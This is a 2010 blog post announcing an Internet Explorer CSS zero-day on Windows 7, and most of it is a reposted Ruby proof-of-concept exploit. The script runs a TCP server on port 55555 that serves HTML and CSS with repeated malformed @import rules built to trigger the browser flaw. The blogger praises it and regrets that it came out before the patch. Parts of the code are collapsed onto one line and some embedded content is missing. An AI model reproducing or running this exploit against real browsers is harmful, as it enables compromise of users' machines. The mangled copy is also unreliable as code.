Thursday, December 23, 2010

Internet Explorer CSS 0Day. Exploit released.

Hi folks,
yes even on my notes the new Internet Explorer (on windows 7) 0Day. It's a nice piece of work.

Internet Explorer CSS 0day on Windows 7

What let me astonished is the exploit release which came before the Microsoft patch.
Here the exploit is:

#!/usr/bin/env ruby

# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)

require 'socket'

def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)

code = opts[:code]
message = opts[:message]
type = opts[:type]

to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end

def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
out_str.split("\n").each do |line|
puts " #{line}"
end
else
sock.close
return false
end
rescue Exception => ex
return false
end
end

def to_uni(str)
res = ""
str.each_byte do |b|
res << "\x00#{b.chr}" end res end @css_name = "\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s" @html_name = "test.html" placeholder = "a" * (@css_name.length/2) @html = <<-HTML HTML @html = "\xfe\xff" + to_uni(@html) @html.gsub!(to_uni(placeholder), @css_name) @css = <<-CSS @import url("#{placeholder}"); @import url("#{placeholder}"); @import url("#{placeholder}"); @import url("#{placeholder}"); CSS @css = "\xfe\xff" + to_uni(@css) @css.gsub!(to_uni(placeholder), @css_name) @index = <<-INDEX #{@html_name} INDEX TCPServer.open(55555) do |srv| while true cli = srv.accept req = "" html = "" css = "" index = "" next unless sock_read(cli, req, 5) while req.length > 0
if req =~ /GET/
if req =~ /GET.*#{Regexp.escape(@html_name)}/
break unless http_send(cli, @html, :type=>"text/html")
elsif req =~ /GET.*index/
break unless http_send(cli, @index)
elsif req =~ /GET.*#{Regexp.escape(@css_name)}/
break unless http_send(cli, @css, :type=>"text/css")
else
break unless http_send(cli, @css, :type=>"text/css")
end
elsif req =~ /QUIT/
exit()
end
req = ""
next unless sock_read(cli, req, 5)
end
cli.close rescue next
end
end



Which basically implements a server who sends back to clients the following page:


It's a really good job, but couldn't wait the patch release before ?
I still need to suggest to switch from IE to Safari or to Firefox without 3-parties plugins.


No comments: